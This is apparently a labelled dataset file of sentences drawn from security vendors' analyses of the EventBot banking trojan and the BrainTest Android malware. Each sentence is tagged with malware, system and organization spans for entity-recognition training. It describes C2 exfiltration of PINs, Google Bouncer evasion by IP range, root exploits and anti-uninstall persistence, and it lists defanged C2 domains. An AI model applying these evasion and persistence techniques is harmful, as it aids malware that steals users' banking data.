{"text": "EventBot has the ability to update its library or potentially even download a second library when given a command from the C2 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000350", "source": "cyner_valid"}}
{"text": "An updated library name is generated by calculating the md5sum of several device properties , while concatenating the build model twice in case of an update to the library .", "spans": {}, "info": {"id": "cyner_valid_000351", "source": "cyner_valid"}}
{"text": "EventBot Updated library naming convention EventBot New library naming convention .", "spans": {"Malware: EventBot": [[43, 51]]}, "info": {"id": "cyner_valid_000352", "source": "cyner_valid"}}
{"text": "Data Encryption The Curve25519 encryption algorithm was implemented as of EventBot Version 0.0.0.2 .", "spans": {"Malware: EventBot": [[74, 82]]}, "info": {"id": "cyner_valid_000353", "source": "cyner_valid"}}
{"text": "This encryption algorithm is an extra security layer for communicating with the C2 , an improvement over the previous version of a plain RC4 encryption .", "spans": {}, "info": {"id": "cyner_valid_000354", "source": "cyner_valid"}}
{"text": "When reviewing the decrypted packet , it ’ s clear it has the same content as previous versions .", "spans": {}, "info": {"id": "cyner_valid_000355", "source": "cyner_valid"}}
{"text": "EventBot decryption of packets from the C2 Decryption of packets from the C2 using Curve25519 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000356", "source": "cyner_valid"}}
{"text": "EVENTBOT VERSION 0.3.0.1 Additional Assets Based on Country / Region EventBot-23aEventBot Spanish and Italian Images in Spanish and Italian added in version 0.3.0.1 .", "spans": {}, "info": {"id": "cyner_valid_000357", "source": "cyner_valid"}}
{"text": "Version 0.3.0.1 includes Italian and Spanish language compatibility within the resources section .", "spans": {}, "info": {"id": "cyner_valid_000358", "source": "cyner_valid"}}
{"text": "Presumably , this was done to make the app seem more credible to targeted users in different countries .", "spans": {}, "info": {"id": "cyner_valid_000359", "source": "cyner_valid"}}
{"text": "It listens to events like TYPE_VIEW_TEXT_CHANGED .", "spans": {}, "info": {"id": "cyner_valid_000361", "source": "cyner_valid"}}
{"text": "We suspect the updated PIN is sent to the C2 , most likely to give the malware the option to perform privileged activities on the infected device related to payments , system configuration options , etc .", "spans": {}, "info": {"id": "cyner_valid_000362", "source": "cyner_valid"}}
{"text": "EventBot Listening to TYPE_VIEW_TEXT_CHANGED accessibility event Listening to TYPE_VIEW_TEXT_CHANGED accessibility event .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000363", "source": "cyner_valid"}}
{"text": "After collecting the changed PIN code , it is sent back to the C2 .", "spans": {}, "info": {"id": "cyner_valid_000364", "source": "cyner_valid"}}
{"text": "EventBot Sending the pin code back to the C2 Sending the pin code back to the C2 .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000365", "source": "cyner_valid"}}
{"text": "Eventually , the screen PIN preferences will be saved to an additional XML file in the shared preferences folder .", "spans": {}, "info": {"id": "cyner_valid_000366", "source": "cyner_valid"}}
{"text": "EventBot screenPinPrefs.xml The content of screenPinPrefs.xml .", "spans": {}, "info": {"id": "cyner_valid_000367", "source": "cyner_valid"}}
{"text": "The grabScreenPin method has separate conditioning to handle screen lock events in Samsung devices .", "spans": {"Organization: Samsung": [[83, 90]]}, "info": {"id": "cyner_valid_000368", "source": "cyner_valid"}}
{"text": "EVENTBOT VERSION 0.4.0.1 Package Name Randomization In this version , the package name is no longer named ‘ com.example.eventbot ’ , which makes it more difficult to track down .", "spans": {}, "info": {"id": "cyner_valid_000370", "source": "cyner_valid"}}
{"text": "EventBot Randomized package name Randomized package name instead of com.example.eventbot .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000371", "source": "cyner_valid"}}
{"text": "ProGuard Obfuscation As with many other Android applications , EventBot is now using obfuscation .", "spans": {"System: ProGuard": [[0, 8]], "System: Android": [[40, 47]], "Malware: EventBot": [[63, 71]]}, "info": {"id": "cyner_valid_000372", "source": "cyner_valid"}}
{"text": "Both the loader and dropped class are obfuscated using ProGuard , which obfuscates names using alphabet letters .", "spans": {}, "info": {"id": "cyner_valid_000373", "source": "cyner_valid"}}
{"text": "The code itself is not modified by this type of obfuscation though , making the analysis easier .", "spans": {}, "info": {"id": "cyner_valid_000374", "source": "cyner_valid"}}
{"text": "EventBot Obfuscated class names Obfuscated class names using letters of the alphabet .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000375", "source": "cyner_valid"}}
{"text": "Hidden Configuration Data As mentioned above , EventBot begins using obfuscation .", "spans": {"Malware: EventBot": [[47, 55]]}, "info": {"id": "cyner_valid_000376", "source": "cyner_valid"}}
{"text": "Due to this obfuscation , a part of the previously mentioned cfg class is now mapped to c/b/a/a/a or c/a/a/a/a .", "spans": {}, "info": {"id": "cyner_valid_000377", "source": "cyner_valid"}}
{"text": "EventBot C2 URLs C2 URLs and other settings in a nested class .", "spans": {}, "info": {"id": "cyner_valid_000378", "source": "cyner_valid"}}
{"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn ’ t changed from the previous version ) The C2 URLs A randomized class name using the device ’ s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version", "spans": {"Malware: EventBot": [[480, 488]]}, "info": {"id": "cyner_valid_000379", "source": "cyner_valid"}}
{"text": "MALWARE UNDER ACTIVE DEVELOPMENT EventBot “ cfg ” class EventBot “ cfg ” class .", "spans": {"Malware: EventBot": [[33, 41], [56, 64]]}, "info": {"id": "cyner_valid_000381", "source": "cyner_valid"}}
{"text": "This example is from a later version of EventBot , and in other versions the naming convention is very similar , with bot IDs such as word100 , word101 , word102 , and test2005 , test2006 etc .", "spans": {"Malware: EventBot": [[40, 48]]}, "info": {"id": "cyner_valid_000383", "source": "cyner_valid"}}
{"text": "In the latest version , a layer of obfuscation was added , perhaps taking the malware one step closer to being fully operational .", "spans": {}, "info": {"id": "cyner_valid_000384", "source": "cyner_valid"}}
{"text": "SUSPECTED DETECTION TESTS BY THE THREAT ACTOR In searching for EventBot , we ’ ve identified multiple submissions from the same submitter hash , 22b3c7b0 : EventBot 22b3c7b0 submitter hash The 22b3c7b0 submitter hash that submitted most of the EventBot samples to VirusTotal .", "spans": {"Malware: EventBot": [[63, 71], [156, 164], [244, 252]]}, "info": {"id": "cyner_valid_000385", "source": "cyner_valid"}}
{"text": "Also , the botnet IDs increment over time as they are submitted .", "spans": {}, "info": {"id": "cyner_valid_000387", "source": "cyner_valid"}}
{"text": "Given this , and the naming convention of the submissions ( .virus ) , the submitter hash most likely belongs to an AV vendor or sandboxing environment that automatically submits samples to online malware databases .", "spans": {}, "info": {"id": "cyner_valid_000388", "source": "cyner_valid"}}
{"text": "It may be that these submissions are made from the author ’ s machine , or that they submit it to a detection service that in turn submits to online malware databases .", "spans": {}, "info": {"id": "cyner_valid_000389", "source": "cyner_valid"}}
{"text": "EVENTBOT THREAT ACTORS As a part of this investigation , the Cybereason Nocturnus team has attempted to identify the threat actors behind the development of EventBot .", "spans": {"Malware: EVENTBOT": [[0, 8]], "Organization: Cybereason Nocturnus": [[61, 81]], "Malware: EventBot": [[157, 165]]}, "info": {"id": "cyner_valid_000390", "source": "cyner_valid"}}
{"text": "The evidence above suggests that EventBot is still in the development stage , and as such , is not likely to have been used for large attack campaigns thus far .", "spans": {"Malware: EventBot": [[33, 41]]}, "info": {"id": "cyner_valid_000391", "source": "cyner_valid"}}
{"text": "The Cybereason Nocturnus team is monitoring multiple underground platforms in an attempt to identify chatter relating to EventBot .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[121, 129]]}, "info": {"id": "cyner_valid_000392", "source": "cyner_valid"}}
{"text": "New malware is often introduced to underground communities by being promoted and sold or offered as a giveaway .", "spans": {}, "info": {"id": "cyner_valid_000393", "source": "cyner_valid"}}
{"text": "However , at the time of writing , we were unable to identify relevant conversations about the EventBot malware .", "spans": {"Malware: EventBot": [[95, 103]]}, "info": {"id": "cyner_valid_000394", "source": "cyner_valid"}}
{"text": "This strengthens our suspicion that this malware is still undergoing development and has not been officially marketed or released yet .", "spans": {}, "info": {"id": "cyner_valid_000395", "source": "cyner_valid"}}
{"text": "EVENTBOT INFRASTRUCTURE By mapping the C2 servers , a clear , repeated pattern emerges based on the specific URL gate_cb8a5aea1ab302f0_c .", "spans": {"Malware: EVENTBOT": [[0, 8]]}, "info": {"id": "cyner_valid_000396", "source": "cyner_valid"}}
{"text": "As of this writing , all the domains were registered recently and some are already offline .", "spans": {}, "info": {"id": "cyner_valid_000397", "source": "cyner_valid"}}
{"text": "URL Status IP Domain registration date http : //ora.studiolegalebasili [ .", "spans": {}, "info": {"id": "cyner_valid_000398", "source": "cyner_valid"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ .", "spans": {}, "info": {"id": "cyner_valid_000399", "source": "cyner_valid"}}
{"text": "] 6 2020-02-29 http : //themoil [ .", "spans": {}, "info": {"id": "cyner_valid_000400", "source": "cyner_valid"}}
{"text": "] site/gate_cb8a5aea1ab302f0_c online 208.91.197 [ .", "spans": {}, "info": {"id": "cyner_valid_000401", "source": "cyner_valid"}}
{"text": "] 91 2020-03-04 http : //ora.carlaarrabitoarchitetto [ .", "spans": {}, "info": {"id": "cyner_valid_000402", "source": "cyner_valid"}}
{"text": "] 102 2020-03-29 http : //ora.blindsidefantasy [ .", "spans": {}, "info": {"id": "cyner_valid_000406", "source": "cyner_valid"}}
{"text": "] 102 2020-04-02 http : //marta.martatovaglieri [ .", "spans": {}, "info": {"id": "cyner_valid_000408", "source": "cyner_valid"}}
{"text": "] it/gate_cb8a5aea1ab302f0_c online 185.158.248 [ .", "spans": {}, "info": {"id": "cyner_valid_000409", "source": "cyner_valid"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.249 [ .", "spans": {}, "info": {"id": "cyner_valid_000411", "source": "cyner_valid"}}
{"text": "] 141 2020-04-26 In the course of the investigation , the team discovered a potential link to an additional Android infostealer .", "spans": {"Malware: Android infostealer": [[108, 127]]}, "info": {"id": "cyner_valid_000412", "source": "cyner_valid"}}
{"text": "The IP address of both ora.carlaarrabitoarchitetto [ .", "spans": {}, "info": {"id": "cyner_valid_000413", "source": "cyner_valid"}}
{"text": "] com , 31.214.157 [ .", "spans": {}, "info": {"id": "cyner_valid_000415", "source": "cyner_valid"}}
{"text": "] 6 , was previously hosting the domain next.nextuptravel [ .", "spans": {}, "info": {"id": "cyner_valid_000416", "source": "cyner_valid"}}
{"text": "This was the C2 for an Android infostealer responsible for several attacks in Italy back in late 2019 .", "spans": {"Malware: Android infostealer": [[23, 42]]}, "info": {"id": "cyner_valid_000418", "source": "cyner_valid"}}
{"text": "EventBot VirusTotal search for the malicious IP address VirusTotal search for the malicious IP address .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000419", "source": "cyner_valid"}}
{"text": "IMPACT EventBot is a mobile malware banking trojan that steals financial information , is able to hijack transactions .", "spans": {"Malware: EventBot": [[7, 15]]}, "info": {"id": "cyner_valid_000420", "source": "cyner_valid"}}
{"text": "Once this malware has successfully installed , it will collect personal data , passwords , keystrokes , banking information , and more .", "spans": {}, "info": {"id": "cyner_valid_000421", "source": "cyner_valid"}}
{"text": "This information can give the attacker access to personal and business bank accounts , personal and business data , and more .", "spans": {}, "info": {"id": "cyner_valid_000422", "source": "cyner_valid"}}
{"text": "60 % of devices containing or accessing enterprise data are mobile .", "spans": {}, "info": {"id": "cyner_valid_000424", "source": "cyner_valid"}}
{"text": "Giving an attacker access to a mobile device can have severe business consequences , especially if the end user is using their mobile device to discuss sensitive business topics or access enterprise financial information .", "spans": {}, "info": {"id": "cyner_valid_000425", "source": "cyner_valid"}}
{"text": "This can result in brand degradation , loss of individual reputation , or loss of consumer trust .", "spans": {}, "info": {"id": "cyner_valid_000426", "source": "cyner_valid"}}
{"text": "Much like we have seen in recent months , anyone can be impacted by a mobile device attack .", "spans": {}, "info": {"id": "cyner_valid_000427", "source": "cyner_valid"}}
{"text": "These attacks are only becoming more common , with one third of all malware now targeting mobile endpoints .", "spans": {}, "info": {"id": "cyner_valid_000428", "source": "cyner_valid"}}
{"text": "Care and concern both for using a mobile device and for securing a mobile device is critical , especially for those organizations that allow bring-your-own-devices .", "spans": {}, "info": {"id": "cyner_valid_000429", "source": "cyner_valid"}}
{"text": "CYBEREASON MOBILE Cybereason Mobile detects EventBot and immediately takes remediation actions to protect the end user .", "spans": {"System: CYBEREASON MOBILE": [[0, 17]], "System: Cybereason Mobile detects": [[18, 43]], "Malware: EventBot": [[44, 52]]}, "info": {"id": "cyner_valid_000430", "source": "cyner_valid"}}
{"text": "Without mobile threat detection , this attack would not be detected , leaving end users and organizations at risk .", "spans": {}, "info": {"id": "cyner_valid_000432", "source": "cyner_valid"}}
{"text": "Cybereason Mobile detects EventBot and provides the user with immediate actions .", "spans": {"System: Cybereason Mobile": [[0, 17]], "Malware: EventBot": [[26, 34]]}, "info": {"id": "cyner_valid_000433", "source": "cyner_valid"}}
{"text": "CONCLUSION In this research , the Nocturnus team has dissected a rapidly evolving Android malware in the making .", "spans": {"Organization: Nocturnus": [[34, 43]], "Malware: Android": [[82, 89]]}, "info": {"id": "cyner_valid_000434", "source": "cyner_valid"}}
{"text": "This malware abuses the Android accessibility feature to steal user information and is able to update its code and release new features every few days .", "spans": {"System: Android": [[24, 31]]}, "info": {"id": "cyner_valid_000435", "source": "cyner_valid"}}
{"text": "With each new version , the malware adds new features like dynamic library loading , encryption , and adjustments to different locales and manufacturers .", "spans": {}, "info": {"id": "cyner_valid_000436", "source": "cyner_valid"}}
{"text": "EventBot appears to be a completely new malware in the early stages of development , giving us an interesting view into how attackers create and test their malware .", "spans": {"Malware: EventBot": [[0, 8]]}, "info": {"id": "cyner_valid_000437", "source": "cyner_valid"}}
{"text": "Cybereason classifies EventBot as a mobile banking trojan and infostealer based on the stealing features discussed in this research .", "spans": {"Organization: Cybereason": [[0, 10]], "Malware: EventBot": [[22, 30]]}, "info": {"id": "cyner_valid_000438", "source": "cyner_valid"}}
{"text": "It leverages webinjects and SMS reading capabilities to bypass two-factor authentication , and is clearly targeting financial applications .", "spans": {}, "info": {"id": "cyner_valid_000439", "source": "cyner_valid"}}
{"text": "Although the threat actor responsible for the development of EventBot is still unknown and the malware does not appear to be involved in major attacks , it is interesting to follow the early stages of mobile malware development .", "spans": {"Malware: EventBot": [[61, 69]]}, "info": {"id": "cyner_valid_000440", "source": "cyner_valid"}}
{"text": "The Cybereason Nocturnus team will continue to monitor EventBot ’ s development .", "spans": {"Organization: Cybereason Nocturnus": [[4, 24]], "Malware: EventBot": [[55, 63]]}, "info": {"id": "cyner_valid_000441", "source": "cyner_valid"}}
{"text": "In recent years , online activity has gradually been shifting from personal computers to mobile devices .", "spans": {}, "info": {"id": "cyner_valid_000442", "source": "cyner_valid"}}
{"text": "Naturally , this resulted in the introduction of malware for mobile platforms , especially Android devices , including Cerberus , Xhelper and the Anubis Banking Trojan .", "spans": {"System: Android": [[91, 98]], "Malware: Cerberus": [[119, 127]], "Malware: Xhelper": [[130, 137]], "Malware: Anubis": [[146, 152]]}, "info": {"id": "cyner_valid_000443", "source": "cyner_valid"}}
{"text": "As many people use their mobile devices for online shopping and even to manage their bank accounts , the mobile arena became increasingly profitable for cyber criminals .", "spans": {}, "info": {"id": "cyner_valid_000444", "source": "cyner_valid"}}
{"text": "This is why we recently released Cybereason Mobile , a new offering that strengthens the Cybereason Defense Platform by bringing prevention , detection , and response capabilities to mobile devices .", "spans": {"System: Cybereason Mobile": [[33, 50]], "System: Cybereason Defense Platform": [[89, 116]]}, "info": {"id": "cyner_valid_000445", "source": "cyner_valid"}}
{"text": "With Cybereason Mobile , our customers can protect against modern threats across traditional and mobile endpoints , all within a single console .", "spans": {"System: Cybereason Mobile": [[5, 22]]}, "info": {"id": "cyner_valid_000446", "source": "cyner_valid"}}
{"text": "Check Point Mobile Threat Prevention has detected two instances of a mobile malware variant infecting multiple devices within the Check Point customer base .", "spans": {"Organization: Check Point": [[0, 11], [130, 141]], "System: Mobile Threat Prevention": [[12, 36]]}, "info": {"id": "cyner_valid_000447", "source": "cyner_valid"}}
{"text": "The malware , packaged within an Android game app called BrainTest , had been published to Google Play twice .", "spans": {"System: Android": [[33, 40]], "Malware: BrainTest": [[57, 66]], "System: Google Play": [[91, 102]]}, "info": {"id": "cyner_valid_000448", "source": "cyner_valid"}}
{"text": "Each instance had between 100,000 and 500,000 downloads according to Google Play statistics , reaching an aggregated infection rate of between 200,000 and 1 million users .", "spans": {"System: Google Play": [[69, 80]]}, "info": {"id": "cyner_valid_000449", "source": "cyner_valid"}}
{"text": "Overview The malware was first detected on a Nexus 5 smartphone , and although the user attempted to remove the infected app , the malware reappeared on the same device shortly thereafter .", "spans": {"System: Nexus 5": [[45, 52]]}, "info": {"id": "cyner_valid_000451", "source": "cyner_valid"}}
{"text": "Our analysis of the malware shows it uses multiple , advanced techniques to avoid Google Play malware detection and to maintain persistency on target devices .", "spans": {"System: Google Play": [[82, 93]]}, "info": {"id": "cyner_valid_000452", "source": "cyner_valid"}}
{"text": "Once this malware was detected on a device , Mobile Threat Prevention adjusted security policies on the Mobile Device Management solution ( MobileIron ) managing the affected devices automatically , thereby blocking enterprise access from the infected devices .", "spans": {"System: Mobile Threat Prevention": [[45, 69]]}, "info": {"id": "cyner_valid_000453", "source": "cyner_valid"}}
{"text": "While the malware is capable of facilitating various cyber-criminal goals , our team confirmed it ’ s currently installing additional apps on infected devices .", "spans": {}, "info": {"id": "cyner_valid_000454", "source": "cyner_valid"}}
{"text": "Disturbingly , the malware establishes a rootkit on the device , allowing it to download and execute any code a cybercriminal would want to run on a device .", "spans": {}, "info": {"id": "cyner_valid_000455", "source": "cyner_valid"}}
{"text": "For example , it could be used to display unwanted and annoying advertisements on a device , or potentially , to download and deploy a payload that steals credentials from an infected device .", "spans": {}, "info": {"id": "cyner_valid_000456", "source": "cyner_valid"}}
{"text": "Highlights Samples of the malicious code found in BrainTest have been found on Google Play , and its creator has used multiple methods to evade detection by Google including Bypassing Google Bouncer by detecting if the malware is being run from an IP or domain mapped to Google Bouncer and , if so , it will not perform its intended malicious activities .", "spans": {"Malware: BrainTest": [[50, 59]], "System: Google Play": [[79, 90]], "Organization: Google": [[157, 163]], "System: Google Bouncer": [[184, 198], [271, 285]]}, "info": {"id": "cyner_valid_000457", "source": "cyner_valid"}}
{"text": "Combining timebombs , dynamic code loading , and use of reflection to complicate reverse engineering of the malware .", "spans": {}, "info": {"id": "cyner_valid_000458", "source": "cyner_valid"}}
{"text": "Using off-the-shelf obfuscation ( packer ) from Baidu to re-introduce the malware to Google Play after the first instance was removed on Aug 24th .", "spans": {"Organization: Baidu": [[48, 53]], "System: Google Play": [[85, 96]]}, "info": {"id": "cyner_valid_000459", "source": "cyner_valid"}}
{"text": "BrainTest uses four privilege escalation exploits to gain root access on a device and to install a persistent malware as a system application .", "spans": {"Malware: BrainTest": [[0, 9]], "Vulnerability: privilege escalation exploits": [[20, 49]]}, "info": {"id": "cyner_valid_000460", "source": "cyner_valid"}}
{"text": "BrainTest leverages an anti-uninstall watchdog that uses two system applications to monitor the removal of one of the components and reinstall the component .", "spans": {"Malware: BrainTest": [[0, 9]], "Vulnerability: anti-uninstall watchdog": [[23, 46]]}, "info": {"id": "cyner_valid_000461", "source": "cyner_valid"}}
{"text": "After the the first instance of BrainTest was detected , Google removed the app from Google Play .", "spans": {"Malware: BrainTest": [[32, 41]], "Organization: Google": [[57, 63]], "System: Google Play": [[85, 96]]}, "info": {"id": "cyner_valid_000462", "source": "cyner_valid"}}
{"text": "Within days , the Check Point research team detected another instance with a different package name but which uses the same code .", "spans": {"Organization: Check Point": [[18, 29]]}, "info": {"id": "cyner_valid_000463", "source": "cyner_valid"}}
{"text": "The malware ’ s creators had used obfuscation to upload the new piece of malware to Google Play .", "spans": {"System: Google Play": [[84, 95]]}, "info": {"id": "cyner_valid_000464", "source": "cyner_valid"}}
{"text": "Technical Analysis The malware consists of 2 applications : The Dropper : Brain Test ( Unpacked – com.mile.brain , Packed – com.zmhitlte.brain ) This is installed from Google Play and downloads an exploit pack from the server to obtain root access on a device .", "spans": {"System: Google Play": [[168, 179]]}, "info": {"id": "cyner_valid_000465", "source": "cyner_valid"}}
{"text": "If root access is obtained , the application downloads a malicious .apk file ( The Backdoor ) from the server and installs it as system application .", "spans": {}, "info": {"id": "cyner_valid_000466", "source": "cyner_valid"}}
{"text": "The Backdoor : System malware ( mcpef.apk and brother.apk ) This tries a few persistence methods by using few anti-uninstall techniques ( described below ) and downloads and executes code from server without user consent .", "spans": {}, "info": {"id": "cyner_valid_000467", "source": "cyner_valid"}}
{"text": "Detailed Malware Structure Malware Strucutre com.mile.brain ( SHA256 : 135d6acff3ca27e6e7997429e5f8051f88215d12351e4103f8344cd66611e0f3 ) : This is the main application found on Google Play .", "spans": {"System: Google Play": [[178, 189]]}, "info": {"id": "cyner_valid_000468", "source": "cyner_valid"}}
{"text": "It contains encrypted java archive “ start.ogg ” in the assets directory and dynamically loads code with dalvik.system.DexClassLoader .", "spans": {}, "info": {"id": "cyner_valid_000469", "source": "cyner_valid"}}
{"text": "do.jar ( SHA256 : a711e620246d9954510d3f1c8d5c784bacc78069a5c57b9ec09c3e234bc33a8b ) : The decrypted file that was created by “ start.ogg. ” It sends a request to the server with the device ’ s configuration .", "spans": {}, "info": {"id": "cyner_valid_000470", "source": "cyner_valid"}}
{"text": "The server ’ s response is a json , containing a link to a .jar file , class name and method name to be executed with reflection API .", "spans": {}, "info": {"id": "cyner_valid_000471", "source": "cyner_valid"}}
{"text": "The application downloads the file and dynamically loads it using dalvik.system.DexClassLoader and invokes class and method specified in json .", "spans": {}, "info": {"id": "cyner_valid_000472", "source": "cyner_valid"}}
{"text": "jhfrte.jar : This is a java archive file downloaded from server .", "spans": {}, "info": {"id": "cyner_valid_000473", "source": "cyner_valid"}}
{"text": "If a device isn ’ t rooted , it downloads from the server an exploit pack and executes it to obtain root on device .", "spans": {}, "info": {"id": "cyner_valid_000474", "source": "cyner_valid"}}
{"text": "Once root is obtained , it downloads an additional APK file from the server ( mcpef.apk ) and installs it as system application ( /system directory ) .", "spans": {}, "info": {"id": "cyner_valid_000475", "source": "cyner_valid"}}
{"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www.77169.org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit .", "spans": {"Vulnerability: CVE-2013-6282": [[81, 94]]}, "info": {"id": "cyner_valid_000476", "source": "cyner_valid"}}
{"text": "mcpef.apk ( SHA256 : a8e7dfac00adf661d371ac52bddc03b543bd6b7aa41314b255e53d810931ceac ) : The malicious system application downloaded from server ( package name – com.android.music.helper ) .", "spans": {}, "info": {"id": "cyner_valid_000478", "source": "cyner_valid"}}
{"text": "If brother.apk application is removed , mcpef.apk reinstalls brother.apk from assets .", "spans": {"System: brother.apk": [[3, 14], [61, 72]], "System: mcpef.apk": [[40, 49]]}, "info": {"id": "cyner_valid_000480", "source": "cyner_valid"}}
{"text": "System application installed by mcpef.apk .", "spans": {}, "info": {"id": "cyner_valid_000482", "source": "cyner_valid"}}
{"text": "This has the same functionality as mcpef.apk .", "spans": {}, "info": {"id": "cyner_valid_000483", "source": "cyner_valid"}}
{"text": "In addition , it monitors to verify if com.android.music.helper package is removed .", "spans": {}, "info": {"id": "cyner_valid_000484", "source": "cyner_valid"}}
{"text": "If mcpef.apk is removed , brother.apk reinstalls it from a META-INF/brother file boy , post.sh : The shell scripts u sed for application persistency .", "spans": {}, "info": {"id": "cyner_valid_000485", "source": "cyner_valid"}}
{"text": "Application lifecycle Application Lifecycle Google Bouncer Bypass On start , the application checks if it is executed on one of the Google servers : IP ranges 209.85.128.0-209.85.255.255 , 216.58.192.0-216.58.223.255 , 173.194.0.0-173.194.255.255 , 74.125.0.0-74.125.255.255 or if it is executed on IP hosted domain that contains the following strings : “ google ” , ” android ” , ” 1e100 ” .", "spans": {"System: Google Bouncer": [[44, 58]], "System: android": [[369, 376]]}, "info": {"id": "cyner_valid_000486", "source": "cyner_valid"}}
{"text": "If any of these conditions is true , the application does not continue to execute the malicious flow .", "spans": {}, "info": {"id": "cyner_valid_000487", "source": "cyner_valid"}}
{"text": "This method is design to bypass the automatic Google Play protection mechanism called Bouncer .", "spans": {"System: Google Play": [[46, 57]], "System: Bouncer": [[86, 93]]}, "info": {"id": "cyner_valid_000488", "source": "cyner_valid"}}
{"text": "Timebombs , Dynamic Code Loading and Reflection If Google Bouncer was not detected , the application starts a time bomb which initiates the malicious flow only after 20 seconds and will run every 2 hours .", "spans": {"System: Google Bouncer": [[51, 65]]}, "info": {"id": "cyner_valid_000489", "source": "cyner_valid"}}
{"text": "Unpacker thread decrypt java archive from assets directory “ start.ogg ” , and dynamically loads it and calls the method “ a.a.a.b ” from this archive .", "spans": {}, "info": {"id": "cyner_valid_000491", "source": "cyner_valid"}}
{"text": "This method checks if eight hours have passed from the first run of application , and if so , request containing the device ’ s data to the server .", "spans": {}, "info": {"id": "cyner_valid_000492", "source": "cyner_valid"}}
{"text": "Then the application downloads java archive from the URL specified in json , dynamically loads it with class loader API .", "spans": {}, "info": {"id": "cyner_valid_000494", "source": "cyner_valid"}}
{"text": "Once archive is loaded , the application uses reflection api to call methods from the class names specified in the json .", "spans": {}, "info": {"id": "cyner_valid_000495", "source": "cyner_valid"}}
{"text": "Rooting and Ad Network Presentation The reflection loaded methods check if the device is rooted .", "spans": {}, "info": {"id": "cyner_valid_000496", "source": "cyner_valid"}}
{"text": "If not , the application downloads a pack of exploits from the server and runs them one-by-one up until root is achieved .", "spans": {}, "info": {"id": "cyner_valid_000497", "source": "cyner_valid"}}
{"text": "As root , the application copies su binary to /system/bin directory and silently downloads apk file from the server .", "spans": {}, "info": {"id": "cyner_valid_000498", "source": "cyner_valid"}}
{"text": "Then , the APK is installed as system application and registers listener on USER_PRESENT event .", "spans": {}, "info": {"id": "cyner_valid_000499", "source": "cyner_valid"}}
{"text": "This event triggers archive downloading thread .", "spans": {}, "info": {"id": "cyner_valid_000500", "source": "cyner_valid"}}
{"text": "Once the event is triggered , it registers a timer .", "spans": {}, "info": {"id": "cyner_valid_000501", "source": "cyner_valid"}}
{"text": "It downloads one more archive and dynamically loads code from it .", "spans": {}, "info": {"id": "cyner_valid_000504", "source": "cyner_valid"}}
{"text": "The final APK is downloaded from a different URL that is currently down , we assume that the apk purpose is overlaying ads on the screen , we assume this based on the research we have done on the API we found which returns URL of random APK file containing different advertising networks .", "spans": {}, "info": {"id": "cyner_valid_000505", "source": "cyner_valid"}}
{"text": "Persistency Watch-Dog The application contains protection against its own removal .", "spans": {}, "info": {"id": "cyner_valid_000506", "source": "cyner_valid"}}
{"text": "As outlined in the diagram above , It installs an additional application with the same functionality and these two applications monitor the removal of each other .", "spans": {}, "info": {"id": "cyner_valid_000507", "source": "cyner_valid"}}
{"text": "If one of the applications is deleted , the second application downloads and re-installs the removed one .", "spans": {}, "info": {"id": "cyner_valid_000508", "source": "cyner_valid"}}
{"text": "Network activity BrainTest communicates with five servers : APK files provider ( http : //psserviceonline [ .", "spans": {}, "info": {"id": "cyner_valid_000509", "source": "cyner_valid"}}
{"text": "] com/ ) : This server provides APK files with advertising network .", "spans": {}, "info": {"id": "cyner_valid_000510", "source": "cyner_valid"}}
{"text": "We found two functions : The first function is http : //s.psserviceonline [ .", "spans": {}, "info": {"id": "cyner_valid_000511", "source": "cyner_valid"}}
{"text": "] com/api/s2s/tracks/ and is used for activation .", "spans": {}, "info": {"id": "cyner_valid_000512", "source": "cyner_valid"}}
{"text": "The second function is http : //s.psserviceonline [ .", "spans": {}, "info": {"id": "cyner_valid_000513", "source": "cyner_valid"}}
{"text": "Regardless of the parameters , it returns a json containing a link for APK file .", "spans": {}, "info": {"id": "cyner_valid_000515", "source": "cyner_valid"}}
{"text": "] com http : //www.adsuperiorstore [ .", "spans": {}, "info": {"id": "cyner_valid_000519", "source": "cyner_valid"}}
{"text": "] com Counter Measures Use an up to date anti-malware software that is capable of identifying this threat .", "spans": {}, "info": {"id": "cyner_valid_000521", "source": "cyner_valid"}}
{"text": "If the threat reappears on the device after the first installation , it means that the malware managed to install the persistency module in the System directory .", "spans": {}, "info": {"id": "cyner_valid_000522", "source": "cyner_valid"}}
{"text": "In this case , the device should be re-flashed with an official ROM .", "spans": {}, "info": {"id": "cyner_valid_000523", "source": "cyner_valid"}}
{"text": "As has been previously reported , some versions of the Android malware were present in the Google Play Store .", "spans": {"System: Android": [[55, 62]], "System: Google Play Store": [[91, 108]]}, "info": {"id": "cyner_valid_000525", "source": "cyner_valid"}}
{"text": "The iOS versions were available outside the app store , through phishing sites , and abused the Apple Developer Enterprise program .", "spans": {"System: iOS": [[4, 7]], "System: app store": [[44, 53]], "Organization: Apple Developer Enterprise": [[96, 122]]}, "info": {"id": "cyner_valid_000526", "source": "cyner_valid"}}
{"text": "Background : Android surveillanceware Early last year , Lookout discovered a sophisticated Android surveillanceware agent that appears to have been created for the lawful intercept market .", "spans": {"System: Android": [[13, 20], [91, 98]], "Organization: Lookout": [[56, 63]]}, "info": {"id": "cyner_valid_000527", "source": "cyner_valid"}}
{"text": "The agent appears to have been under development for at least five years and consists of three stages .", "spans": {}, "info": {"id": "cyner_valid_000528", "source": "cyner_valid"}}
